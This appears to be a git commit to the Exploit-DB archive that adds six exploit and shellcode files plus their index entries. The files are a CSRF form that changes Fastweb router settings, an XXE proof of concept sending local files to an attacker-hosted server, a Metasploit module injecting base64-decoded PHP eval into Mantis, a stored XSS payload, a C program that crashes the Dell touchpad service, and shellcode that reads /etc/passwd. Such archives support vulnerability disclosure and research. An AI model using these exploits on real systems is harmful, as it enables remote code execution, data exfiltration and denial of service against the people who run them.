DB: 2018-05-11
7 changes to exploits/shellcodes Dell Touchpad - 'ApMsgFwd.exe' Denial of Service Mantis 1.1.3 - manage_proj_page PHP Code Execution (Metasploit) Fastweb FASTGate 0.00.47 - Cross-site Request Forgery ModbusPal 1.6b - XML External Entity Injection MyBB Latest Posts on Profile Plugin 1.1 - Cross-Site Scripting Linux/x86 - Read /etc/passwd Shellcode (62 bytes)
This commit is contained in:
parent
017887466c
commit
e7bb9d2985
9 changed files with 433 additions and 0 deletions
42
exploits/hardware/webapps/44606.html
Normal file
42
exploits/hardware/webapps/44606.html
Normal file
|
@ -0,0 +1,42 @@
|
||||||
|
# Exploit Title: Fastweb FASTgate 0.00.47 CSRF
|
||||||
|
# Date: 09-05-2018
|
||||||
|
# Exploit Authors: Raffaele Sabato
|
||||||
|
# Contact: https://twitter.com/syrion89
|
||||||
|
# Vendor: Fastweb
|
||||||
|
# Product Web Page: http://www.fastweb.it/adsl-fibra-ottica/dettagli/modem-fastweb-fastgate/
|
||||||
|
# Version: 0.00.47
|
||||||
|
# CVE: CVE-2018-6023
|
||||||
|
|
||||||
|
I DESCRIPTION
|
||||||
|
========================================================================
|
||||||
|
|
||||||
|
An issue was discovered in Fastweb FASTgate 0.00.47 device. A Cross-site request forgery (CSRF) vulnerability allows remote attackers to hijack the authentication of users for requests that modify the configuration. This vulnerability may lead to Gues Wi-Fi activating, Wi-Fi password changing, etc.
|
||||||
|
The vulnerability was disclosed to Fastweb on 19 January 2018.
|
||||||
|
Fastweb independently patched customer devices with non-vulneable version .67 from December 2017 thru March 2018.
|
||||||
|
|
||||||
|
II PROOF OF CONCEPT
|
||||||
|
========================================================================
|
||||||
|
|
||||||
|
## Activate Gues Wi-Fi:
|
||||||
|
|
||||||
|
<html>
|
||||||
|
<body>
|
||||||
|
<script>history.pushState('', '', '/')</script>
|
||||||
|
<form action="http://192.168.1.254/status.cgi">
|
||||||
|
<input type="hidden" name="_" value="1516312144136" />
|
||||||
|
<input type="hidden" name="act" value="nvset" />
|
||||||
|
<input type="hidden" name="hotspot_broadcast_ssid" value="1" />
|
||||||
|
<input type="hidden" name="hotspot_enable" value="1" />
|
||||||
|
<input type="hidden" name="hotspot_filtering" value="all" />
|
||||||
|
<input type="hidden" name="hotspot_security" value="WPA2PSK" />
|
||||||
|
<input type="hidden" name="hotspot_ssid" value="GUEST-Test" />
|
||||||
|
<input type="hidden" name="hotspot_timeout" value="-1" />
|
||||||
|
<input type="hidden" name="service" value="wl_guestaccess" />
|
||||||
|
<input type="submit" value="Submit request" />
|
||||||
|
</form>
|
||||||
|
</body>
|
||||||
|
</html>
|
||||||
|
|
||||||
|
III REFERENCES
|
||||||
|
========================================================================
|
||||||
|
http://www.fastweb.it/myfastpage/assistenza/guide/FASTGate/
|
53
exploits/java/webapps/44607.txt
Normal file
53
exploits/java/webapps/44607.txt
Normal file
|
@ -0,0 +1,53 @@
|
||||||
|
[+] Exploit Title: ModbusPal XXE Injection
|
||||||
|
[+] Date: 05-08-2018
|
||||||
|
[+] Exploit Author: Trent Gordon
|
||||||
|
[+] Vendor Homepage: http://modbuspal.sourceforge.net/
|
||||||
|
[+] Software Link: https://sourceforge.net/projects/modbuspal/files/latest/download?source=files
|
||||||
|
[+] Version: 1.6b
|
||||||
|
[+] Tested on: Ubuntu 16.04 with Java 1.8.0_151
|
||||||
|
[+] CVE: CVE-2018-10832
|
||||||
|
|
||||||
|
1. Vulnerability Description
|
||||||
|
|
||||||
|
ModbusPal 1.6b is vulnerable to an XML External Entity (XXE) attack. Projects are saved as .xmpp files and automations can be exported as .xmpa files, both XML-based and vulnerable to XXE injection. Sending a crafted .xmpp or .xmpa file to a user, when opened/imported in ModbusPal 1.6b, will return the contents of any local files to a remote attacker.
|
||||||
|
|
||||||
|
2. Proof of Concept
|
||||||
|
|
||||||
|
a.) python -m SimpleHTTPServer 9999 (listening on ATTACKERS-IP and hosting evil.xml)
|
||||||
|
|
||||||
|
b.) Contents of hosted "evil.xml"
|
||||||
|
|
||||||
|
<!ENTITY % data SYSTEM "file:///etc/issue">
|
||||||
|
<!ENTITY % param1 "<!ENTITY exfil SYSTEM 'http://ATTACKERS-IP:9999/?%data;'>">
|
||||||
|
|
||||||
|
c.) Example Exploited "xxe.xmpa"
|
||||||
|
|
||||||
|
<?xml version="1.0" ?>
|
||||||
|
|
||||||
|
<!DOCTYPE r [
|
||||||
|
|
||||||
|
<!ELEMENT r ANY >
|
||||||
|
|
||||||
|
<!ENTITY % sp SYSTEM "http://ATTACKERS-IP:9999/evil.xml">
|
||||||
|
|
||||||
|
%sp;
|
||||||
|
|
||||||
|
%param1;
|
||||||
|
|
||||||
|
]>
|
||||||
|
|
||||||
|
<r>&exfil;</r>
|
||||||
|
|
||||||
|
<!DOCTYPE modbuspal_automation SYSTEM "modbuspal.dtd">
|
||||||
|
|
||||||
|
<modbuspal_automation>
|
||||||
|
|
||||||
|
<automation name="temp" step="1.0" loop="true" init="0.0">
|
||||||
|
|
||||||
|
</automation>
|
||||||
|
|
||||||
|
</modbuspal_automation>
|
||||||
|
|
||||||
|
3. Additional Details
|
||||||
|
|
||||||
|
Java 1.7 contains certain defenses against XXE, including throwing a java.net.MalformedURLException when certain characters (such as '/n') are included in a URL. This means that the file exfiltrated in the above attack is limited to single line files that dont contain any restricted characters. The above POC uses /etc/issue, which is one of the few common linux files that meets this criteria. Exploitation of this vulnerability on later versions of Java requires a more creative approach than described above, such as using FTP instead of URL to exfiltrate /etc/passwd.
|
124
exploits/php/remote/44611.rb
Executable file
124
exploits/php/remote/44611.rb
Executable file
|
@ -0,0 +1,124 @@
|
||||||
|
##
|
||||||
|
# This module requires Metasploit: https://metasploit.com/download
|
||||||
|
# Current source: https://github.com/rapid7/metasploit-framework
|
||||||
|
##
|
||||||
|
|
||||||
|
class MetasploitModule < Msf::Exploit::Remote
|
||||||
|
Rank = ExcellentRanking
|
||||||
|
|
||||||
|
include Msf::Exploit::Remote::HttpClient
|
||||||
|
|
||||||
|
def initialize(info = {})
|
||||||
|
super(update_info(info,
|
||||||
|
'Name' => 'Mantis manage_proj_page PHP Code Execution',
|
||||||
|
'Description' => %q{
|
||||||
|
Mantis v1.1.3 and earlier are vulnerable to a post-authentication Remote
|
||||||
|
Code Execution vulnerability in the sort parameter of the
|
||||||
|
manage_proj_page.php page.
|
||||||
|
},
|
||||||
|
'Author' => [
|
||||||
|
'EgiX', # Exploit-DB Entry Author
|
||||||
|
'Lars Sorenson' # MSF module author
|
||||||
|
],
|
||||||
|
'License' => MSF_LICENSE,
|
||||||
|
'References' =>
|
||||||
|
[
|
||||||
|
['EDB', '6768'],
|
||||||
|
['CVE', '2008-4687'],
|
||||||
|
],
|
||||||
|
'Privileged' => false,
|
||||||
|
'Platform' => ['php'],
|
||||||
|
'Arch' => ARCH_PHP,
|
||||||
|
'Targets' =>
|
||||||
|
[
|
||||||
|
[ 'Mantis <= 1.1.3', { } ],
|
||||||
|
],
|
||||||
|
'DisclosureDate' => 'Oct 16, 2008',
|
||||||
|
'DefaultTarget' => 0))
|
||||||
|
register_options(
|
||||||
|
[
|
||||||
|
OptString.new('TARGETURI', [true, 'The path to the Mantis installation', '/mantisbt/']),
|
||||||
|
OptString.new('USERNAME', [true, 'The username to log in as', 'administrator']),
|
||||||
|
OptString.new('PASSWORD', [true, 'The password to log in with', 'root']),
|
||||||
|
])
|
||||||
|
end
|
||||||
|
|
||||||
|
def check
|
||||||
|
vprint_status('Checking Mantis version ...')
|
||||||
|
res = send_request_cgi({
|
||||||
|
'uri' => normalize_uri(target_uri.path, 'login_page.php'),
|
||||||
|
'method' => 'GET'
|
||||||
|
})
|
||||||
|
|
||||||
|
unless res
|
||||||
|
vprint_error('Connection to host failed!')
|
||||||
|
return CheckCode::Unknown
|
||||||
|
end
|
||||||
|
|
||||||
|
unless res.body =~ /Mantis ([0-9]+\.[0-9]+\.[0-9]+)/
|
||||||
|
vprint_error('Cannot determine Mantis version!')
|
||||||
|
return CheckCode::Unknown
|
||||||
|
end
|
||||||
|
|
||||||
|
version = Gem::Version.new(Regexp.last_match[1])
|
||||||
|
|
||||||
|
vprint_status("Mantis version #{version} detected")
|
||||||
|
|
||||||
|
if res.code == 200 && version <= Gem::Version.new('1.1.3')
|
||||||
|
return CheckCode::Appears
|
||||||
|
end
|
||||||
|
|
||||||
|
CheckCode::Safe
|
||||||
|
end
|
||||||
|
|
||||||
|
def login
|
||||||
|
vprint_status("Logging in as #{datastore['username']}:#{datastore['password']} ... ")
|
||||||
|
res = send_request_cgi({
|
||||||
|
'method' => 'GET',
|
||||||
|
'uri' => normalize_uri(target_uri.path, 'login_page.php'),
|
||||||
|
})
|
||||||
|
unless res
|
||||||
|
fail_with(Failure::Unreachable, 'Cannot access host to log in!')
|
||||||
|
end
|
||||||
|
|
||||||
|
res = send_request_cgi({
|
||||||
|
'uri' => normalize_uri(target_uri.path, 'login.php'),
|
||||||
|
'method' => 'POST',
|
||||||
|
'vars_post' => {
|
||||||
|
'username': datastore['username'],
|
||||||
|
'password': datastore['password'],
|
||||||
|
},
|
||||||
|
'cookie'=> "PHPSESSID=#{res.get_cookies}"
|
||||||
|
})
|
||||||
|
unless res
|
||||||
|
fail_with(Failure::Unknown, 'Cannot access host to log in!')
|
||||||
|
end
|
||||||
|
|
||||||
|
fail_with(Failure::Unreachable, 'Login failed!') unless res.code == 302
|
||||||
|
fail_with(Failure::NoAccess, 'Wrong credentials!') if res.redirection.to_s.include?('login_page.php')
|
||||||
|
|
||||||
|
store_valid_credential(user: datastore['USERNAME'], private: datastore['PASSWORD'])
|
||||||
|
res.get_cookies
|
||||||
|
end
|
||||||
|
|
||||||
|
def exploit
|
||||||
|
fail_with(Failure::NotVulnerable, 'Target is not vulnerable!') unless check == CheckCode::Appears
|
||||||
|
|
||||||
|
cookie = login
|
||||||
|
vprint_status('Sending payload ...')
|
||||||
|
payload_b64 = Rex::Text.encode_base64(payload.encoded)
|
||||||
|
data = {
|
||||||
|
'sort' => "']);}error_reporting(0);print(_code_);eval(base64_decode($_SERVER[HTTP_CMD]));die();#",
|
||||||
|
}
|
||||||
|
send_request_cgi({
|
||||||
|
'uri' => normalize_uri(target_uri.path, 'manage_proj_page.php'),
|
||||||
|
'method' => 'POST',
|
||||||
|
'vars_post' => data,
|
||||||
|
'headers' => {
|
||||||
|
'Connection': 'close',
|
||||||
|
'Cookie': cookie.to_s,
|
||||||
|
'Cmd': payload_b64
|
||||||
|
}
|
||||||
|
})
|
||||||
|
end
|
||||||
|
end
|
28
exploits/php/webapps/44608.txt
Normal file
28
exploits/php/webapps/44608.txt
Normal file
|
@ -0,0 +1,28 @@
|
||||||
|
# Exploit Title: MyBB Latest Posts on Profile Plugin v1.1 - Cross-Site Scripting
|
||||||
|
# Date: 4/20/2018
|
||||||
|
# Author: 0xB9
|
||||||
|
# Contact: luxorforums.com/User-0xB9 or 0xB9[at]pm.me
|
||||||
|
# Software Link: https://community.mybb.com/mods.php?action=view&pid=914
|
||||||
|
# Version: 1.1
|
||||||
|
# Tested on: Ubuntu 17.10
|
||||||
|
# CVE: CVE-2018-10580
|
||||||
|
|
||||||
|
|
||||||
|
1. Description:
|
||||||
|
Adds a new section to user profiles that will display their last posts.
|
||||||
|
|
||||||
|
|
||||||
|
2. Proof of Concept:
|
||||||
|
|
||||||
|
Persistent XSS
|
||||||
|
- Create a thread with the following subject <script>alert('XSS')</script>
|
||||||
|
- Now visit your profile to see the alert.
|
||||||
|
|
||||||
|
|
||||||
|
3. Solution:
|
||||||
|
I reported the plugin twice over the past 3 weeks and recieved no response.
|
||||||
|
|
||||||
|
|
||||||
|
The following should be added in line 236 to properly sanitize thread subjects.
|
||||||
|
|
||||||
|
$d['tsubject'] = htmlspecialchars_uni($d['tsubject']);
|
112
exploits/windows/dos/44610.c
Normal file
112
exploits/windows/dos/44610.c
Normal file
|
@ -0,0 +1,112 @@
|
||||||
|
/*
|
||||||
|
Title: Dell Touchpad - ApMsgFwd.exe Denial Of Service
|
||||||
|
Author: Souhail Hammou
|
||||||
|
Vendor Homepage: https://www.alps.com/
|
||||||
|
Tested on : Alps Pointing-device Driver 10.1.101.207
|
||||||
|
CVE: CVE-2018-10828
|
||||||
|
*/
|
||||||
|
|
||||||
|
#include <stdio.h>
|
||||||
|
#include <stdlib.h>
|
||||||
|
#include <windows.h>
|
||||||
|
|
||||||
|
/*
|
||||||
|
Details:
|
||||||
|
==========
|
||||||
|
ApMsgFwd.exe belonging to Dell Touchpad, ALPS Touchpad driver, ALPS pointing-device for VAIO, Thinkpad Ultranav Driver ..etc
|
||||||
|
allows the current user to map and write to the "ApMsgFwd File Mapping Object" section.
|
||||||
|
ApMsgFwd.exe uses the data written to the section as arguments to functions.
|
||||||
|
This causes a denial of service condition when invalid pointers are written to the mapped section.
|
||||||
|
|
||||||
|
The crash :
|
||||||
|
===========
|
||||||
|
(b88.aa0): Access violation - code c0000005 (first chance)
|
||||||
|
First chance exceptions are reported before any exception handling.
|
||||||
|
This exception may be expected and handled.
|
||||||
|
KERNELBASE!MultiByteToWideChar+0x3d8:
|
||||||
|
00007ffc`06422e08 443830 cmp byte ptr [rax],r14b ds:d05d05d0`5d05d05d=??
|
||||||
|
0:004> r
|
||||||
|
rax=d05d05d05d05d05d rbx=00000000000004e4 rcx=000000007fffffff
|
||||||
|
rdx=0000000000000000 rsi=00000000ffffffff rdi=d05d05d05d05d05d
|
||||||
|
rip=00007ffc06422e08 rsp=000000000272fae0 rbp=000000000272fb59
|
||||||
|
r8=0000000000000000 r9=00000000ffffffff r10=0000000000000000
|
||||||
|
r11=000000000272fbc0 r12=00000000000001f4 r13=0000000000000000
|
||||||
|
r14=0000000000000000 r15=0000000000563e40
|
||||||
|
iopl=0 nv up ei pl zr na po nc
|
||||||
|
cs=0033 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010246
|
||||||
|
KERNELBASE!MultiByteToWideChar+0x3d8:
|
||||||
|
00007ffc`06422e08 443830 cmp byte ptr [rax],r14b ds:d05d05d0`5d05d05d=??
|
||||||
|
|
||||||
|
|
||||||
|
0:001> lm v m ApMsgFwd
|
||||||
|
Browse full module list
|
||||||
|
start end module name
|
||||||
|
00000000`00400000 00000000`00415000 ApMsgFwd (no symbols)
|
||||||
|
Loaded symbol image file: C:\Program Files\DellTPad\ApMsgFwd.exe
|
||||||
|
Image path: C:\Program Files\DellTPad\ApMsgFwd.exe
|
||||||
|
Image name: ApMsgFwd.exe
|
||||||
|
Browse all global symbols functions data
|
||||||
|
Timestamp: Tue Jul 1 09:03:05 2014 (53B27949)
|
||||||
|
CheckSum: 00020F5D
|
||||||
|
ImageSize: 00015000
|
||||||
|
File version: 8.1.0.44
|
||||||
|
Product version: 8.1.0.44
|
||||||
|
File flags: 0 (Mask 3F)
|
||||||
|
File OS: 40004 NT Win32
|
||||||
|
File type: 1.0 App
|
||||||
|
File date: 00000000.00000000
|
||||||
|
Translations: 0411.04b0
|
||||||
|
CompanyName: Alps Electric Co., Ltd.
|
||||||
|
ProductName: ApMsgFwd
|
||||||
|
InternalName: ApMsgFwd
|
||||||
|
OriginalFilename: ApMsgFwd.exe
|
||||||
|
ProductVersion: 8, 1, 0, 44
|
||||||
|
FileVersion: 8, 1, 0, 44
|
||||||
|
PrivateBuild: 8, 1, 0, 44
|
||||||
|
SpecialBuild: 8, 1, 0, 44
|
||||||
|
FileDescription: ApMsgFwd
|
||||||
|
LegalCopyright: Copyright (C) 2006-2014 Alps Electric Co., Ltd.
|
||||||
|
LegalTrademarks: Copyright (C) 2006-2014 Alps Electric Co., Ltd.
|
||||||
|
Comments: Copyright (C) 2006-2014 Alps Electric Co., Ltd.
|
||||||
|
*/
|
||||||
|
int main(int argc, char** argv)
|
||||||
|
{
|
||||||
|
HANDLE ApMpHnd,StartEvtHnd,KeyHnd;
|
||||||
|
PBYTE MappedBuf;
|
||||||
|
|
||||||
|
if ( ! (ApMpHnd = OpenFileMappingA(FILE_MAP_WRITE,FALSE,"ApMsgFwd File Mapping Object") ) )
|
||||||
|
{
|
||||||
|
printf("OpenFileMapping Failed !\n");
|
||||||
|
goto ret;
|
||||||
|
}
|
||||||
|
|
||||||
|
if ( ! ( MappedBuf = MapViewOfFile(ApMpHnd,FILE_MAP_WRITE,0,0,0x1A0) ) )
|
||||||
|
{
|
||||||
|
printf("MapViewOfFile Failed !\n");
|
||||||
|
goto cleanup_0;
|
||||||
|
}
|
||||||
|
|
||||||
|
StartEvtHnd = OpenEventA(EVENT_MODIFY_STATE,FALSE,"ApMsgFwd Event Start");
|
||||||
|
|
||||||
|
if ( ! StartEvtHnd )
|
||||||
|
{
|
||||||
|
printf("OpenEvent Failed !\n");
|
||||||
|
goto cleanup_1;
|
||||||
|
}
|
||||||
|
|
||||||
|
ZeroMemory(MappedBuf,0x1A0);
|
||||||
|
*MappedBuf = 9; //switch case 9
|
||||||
|
*(DWORD*)(MappedBuf + 0x60) = 0x5D05D05D;
|
||||||
|
*(DWORD*)(MappedBuf + 0x64) = 0xD05D05D0;
|
||||||
|
|
||||||
|
/*Wake up the waiting thread*/
|
||||||
|
SetEvent(StartEvtHnd);
|
||||||
|
|
||||||
|
CloseHandle(StartEvtHnd);
|
||||||
|
cleanup_1:
|
||||||
|
UnmapViewOfFile(MappedBuf);
|
||||||
|
cleanup_0:
|
||||||
|
CloseHandle(ApMpHnd);
|
||||||
|
ret:
|
||||||
|
return 0;
|
||||||
|
}
|
|
@ -3,6 +3,8 @@
|
||||||
# Software Vendor: NComputing
|
# Software Vendor: NComputing
|
||||||
# Software Link:
|
# Software Link:
|
||||||
# Author: Javier Bernardo
|
# Author: Javier Bernardo
|
||||||
|
# Contact: javier@kwell.net
|
||||||
|
# Website: http://www.kwell.net
|
||||||
# CVE: CVE-2018-10201
|
# CVE: CVE-2018-10201
|
||||||
# Category: Webapps
|
# Category: Webapps
|
||||||
|
|
||||||
|
|
|
@ -5968,6 +5968,7 @@ id,file,description,date,author,type,platform,port
|
||||||
44593,exploits/windows/dos/44593.py,"HWiNFO 5.82-3410 - Denial of Service",2018-05-06,bzyo,dos,windows,
|
44593,exploits/windows/dos/44593.py,"HWiNFO 5.82-3410 - Denial of Service",2018-05-06,bzyo,dos,windows,
|
||||||
44600,exploits/windows_x86/dos/44600.c,"2345 Security Guard 3.7 - Denial of Service",2018-05-08,anhkgg,dos,windows_x86,
|
44600,exploits/windows_x86/dos/44600.c,"2345 Security Guard 3.7 - Denial of Service",2018-05-08,anhkgg,dos,windows_x86,
|
||||||
44605,exploits/windows/dos/44605.py,"Allok Video Splitter 3.1.12.17 - Denial of Service",2018-05-09,Achilles,dos,windows,
|
44605,exploits/windows/dos/44605.py,"Allok Video Splitter 3.1.12.17 - Denial of Service",2018-05-09,Achilles,dos,windows,
|
||||||
|
44610,exploits/windows/dos/44610.c,"Dell Touchpad - 'ApMsgFwd.exe' Denial of Service",2018-05-10,"Souhail Hammou",dos,windows,
|
||||||
3,exploits/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation",2003-03-30,"Wojciech Purczynski",local,linux,
|
3,exploits/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation",2003-03-30,"Wojciech Purczynski",local,linux,
|
||||||
4,exploits/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Local Buffer Overflow",2003-04-01,Andi,local,solaris,
|
4,exploits/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Local Buffer Overflow",2003-04-01,Andi,local,solaris,
|
||||||
12,exploits/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,local,linux,
|
12,exploits/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,local,linux,
|
||||||
|
@ -16480,6 +16481,7 @@ id,file,description,date,author,type,platform,port
|
||||||
44597,exploits/unix/remote/44597.rb,"Palo Alto Networks - 'readSessionVarsFromFile()' Session Corruption (Metasploit)",2018-05-08,Metasploit,remote,unix,443
|
44597,exploits/unix/remote/44597.rb,"Palo Alto Networks - 'readSessionVarsFromFile()' Session Corruption (Metasploit)",2018-05-08,Metasploit,remote,unix,443
|
||||||
44598,exploits/php/remote/44598.rb,"PlaySMS - 'import.php' Authenticated CSV File Upload Code Execution (Metasploit)",2018-05-08,Metasploit,remote,php,
|
44598,exploits/php/remote/44598.rb,"PlaySMS - 'import.php' Authenticated CSV File Upload Code Execution (Metasploit)",2018-05-08,Metasploit,remote,php,
|
||||||
44599,exploits/php/remote/44599.rb,"PlaySMS 1.4 - 'sendfromfile.php?Filename' Authenticated 'Code Execution (Metasploit)",2018-05-08,Metasploit,remote,php,
|
44599,exploits/php/remote/44599.rb,"PlaySMS 1.4 - 'sendfromfile.php?Filename' Authenticated 'Code Execution (Metasploit)",2018-05-08,Metasploit,remote,php,
|
||||||
|
44611,exploits/php/remote/44611.rb,"Mantis 1.1.3 - manage_proj_page PHP Code Execution (Metasploit)",2018-05-10,Metasploit,remote,php,80
|
||||||
6,exploits/php/webapps/6.php,"WordPress 2.0.2 - 'cache' Remote Shell Injection",2006-05-25,rgod,webapps,php,
|
6,exploits/php/webapps/6.php,"WordPress 2.0.2 - 'cache' Remote Shell Injection",2006-05-25,rgod,webapps,php,
|
||||||
44,exploits/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",2003-06-20,"Rick Patel",webapps,php,
|
44,exploits/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",2003-06-20,"Rick Patel",webapps,php,
|
||||||
47,exploits/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",2003-06-30,Spoofed,webapps,php,
|
47,exploits/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",2003-06-30,Spoofed,webapps,php,
|
||||||
|
@ -39292,3 +39294,6 @@ id,file,description,date,author,type,platform,port
|
||||||
44587,exploits/php/webapps/44587.txt,"IceWarp Mail Server < 11.1.1 - Directory Traversal",2018-05-04,"Trustwave's SpiderLabs",webapps,php,
|
44587,exploits/php/webapps/44587.txt,"IceWarp Mail Server < 11.1.1 - Directory Traversal",2018-05-04,"Trustwave's SpiderLabs",webapps,php,
|
||||||
44589,exploits/linux/webapps/44589.txt,"CSP MySQL User Manager 2.3.1 - Authentication Bypass",2018-05-06,"Youssef Mami",webapps,linux,
|
44589,exploits/linux/webapps/44589.txt,"CSP MySQL User Manager 2.3.1 - Authentication Bypass",2018-05-06,"Youssef Mami",webapps,linux,
|
||||||
44595,exploits/php/webapps/44595.rb,"WordPress Plugin User Role Editor < 4.25 - Privilege Escalation",2018-05-06,"Tomislav Paskalev",webapps,php,
|
44595,exploits/php/webapps/44595.rb,"WordPress Plugin User Role Editor < 4.25 - Privilege Escalation",2018-05-06,"Tomislav Paskalev",webapps,php,
|
||||||
|
44606,exploits/hardware/webapps/44606.html,"Fastweb FASTGate 0.00.47 - Cross-site Request Forgery",2018-05-10,"Raffaele Sabato",webapps,hardware,
|
||||||
|
44607,exploits/java/webapps/44607.txt,"ModbusPal 1.6b - XML External Entity Injection",2018-05-10,"Trent Gordon",webapps,java,
|
||||||
|
44608,exploits/php/webapps/44608.txt,"MyBB Latest Posts on Profile Plugin 1.1 - Cross-Site Scripting",2018-05-10,0xB9,webapps,php,
|
||||||
|
|
Can't render this file because it is too large.
|
|
@ -882,3 +882,4 @@ id,file,description,date,author,type,platform
|
||||||
44517,shellcodes/linux_x86/44517.c,"Linux/x86 - execve(/bin/sh) + ROT-13 + RShift-2 + XOR Encoded Shellcode (44 bytes)",2018-04-24,"Nuno Freitas",shellcode,linux_x86
|
44517,shellcodes/linux_x86/44517.c,"Linux/x86 - execve(/bin/sh) + ROT-13 + RShift-2 + XOR Encoded Shellcode (44 bytes)",2018-04-24,"Nuno Freitas",shellcode,linux_x86
|
||||||
44594,shellcodes/linux_x86/44594.c,"Linux/x86 - execve(/bin/sh) + NOT Encoded Shellcode (27 bytes)",2018-05-06,"Nuno Freitas",shellcode,linux_x86
|
44594,shellcodes/linux_x86/44594.c,"Linux/x86 - execve(/bin/sh) + NOT Encoded Shellcode (27 bytes)",2018-05-06,"Nuno Freitas",shellcode,linux_x86
|
||||||
44602,shellcodes/linux_x86/44602.c,"Linux/x86 - Bind TCP (9443/TCP) Shell + fork() + Null-Free Shellcode (113 bytes)",2018-05-09,"Amine Kanane",shellcode,linux_x86
|
44602,shellcodes/linux_x86/44602.c,"Linux/x86 - Bind TCP (9443/TCP) Shell + fork() + Null-Free Shellcode (113 bytes)",2018-05-09,"Amine Kanane",shellcode,linux_x86
|
||||||
|
44609,shellcodes/linux_x86/44609.c,"Linux/x86 - Read /etc/passwd Shellcode (62 bytes)",2018-05-10,"Nuno Freitas",shellcode,linux_x86
|
||||||
|
|
|
66
shellcodes/linux_x86/44609.c
Normal file
66
shellcodes/linux_x86/44609.c
Normal file
|
@ -0,0 +1,66 @@
|
||||||
|
/*
|
||||||
|
; Title : Linux/x86 - Read /etc/passwd Shellcode (62 bytes)
|
||||||
|
; Date : May, 2018
|
||||||
|
; Author : Nuno Freitas
|
||||||
|
; Blog Post : https://bufferoverflowed.wordpress.com/slae32/slae-32-polymorphing-shellcodes/
|
||||||
|
; Twitter : @nunof11
|
||||||
|
; SLAE ID : SLAE-1112
|
||||||
|
; Size : 62 bytes
|
||||||
|
; Tested on : i686 GNU/Linux
|
||||||
|
|
||||||
|
section .text
|
||||||
|
|
||||||
|
global _start
|
||||||
|
|
||||||
|
_start:
|
||||||
|
xor eax, eax
|
||||||
|
jmp two
|
||||||
|
|
||||||
|
one:
|
||||||
|
pop ebx
|
||||||
|
mov al, 0x5
|
||||||
|
int 0x80
|
||||||
|
mov esi, eax
|
||||||
|
jmp read
|
||||||
|
|
||||||
|
exit:
|
||||||
|
mov al, 0x1
|
||||||
|
xor ebx, ebx
|
||||||
|
int 0x80
|
||||||
|
|
||||||
|
read:
|
||||||
|
mov ebx, esi
|
||||||
|
mov al, 0x3
|
||||||
|
mov ecx, esp
|
||||||
|
mov dl, 0x01
|
||||||
|
int 0x80
|
||||||
|
|
||||||
|
xor ebx, ebx
|
||||||
|
cmp eax, ebx
|
||||||
|
je exit
|
||||||
|
|
||||||
|
mov al, 0x4
|
||||||
|
mov bl, 0x1
|
||||||
|
int 0x80
|
||||||
|
|
||||||
|
inc esp
|
||||||
|
jmp read
|
||||||
|
|
||||||
|
two:
|
||||||
|
call one
|
||||||
|
string: db "/etc/passwd"
|
||||||
|
*/
|
||||||
|
|
||||||
|
#include <stdio.h>
|
||||||
|
#include <string.h>
|
||||||
|
|
||||||
|
unsigned char shellcode[] = \
|
||||||
|
"\x31\xc9\xf7\xe1\xeb\x28\x5b\xb0\x05\xcd\x80\x89\xc6\xeb\x06\xb0\x01\x31\xdb\xcd\x80\x89\xf3\xb0\x03\x89\xe1\xb2\x01\xcd\x80\x31\xdb\x39\xd8\x74\xea\xb0\x04\xb3\x01\xcd\x80\x44\xeb\xe7\xe8\xd3\xff\xff\xff\x2f\x65\x74\x63\x2f\x70\x61\x73\x73\x77\x64";
|
||||||
|
|
||||||
|
void main()
|
||||||
|
{
|
||||||
|
printf("Shellcode Length: %d\n", strlen(shellcode));
|
||||||
|
|
||||||
|
int (*ret)() = (int(*)())shellcode;
|
||||||
|
ret();
|
||||||
|
}
|
Loading…
Add table
Reference in a new issue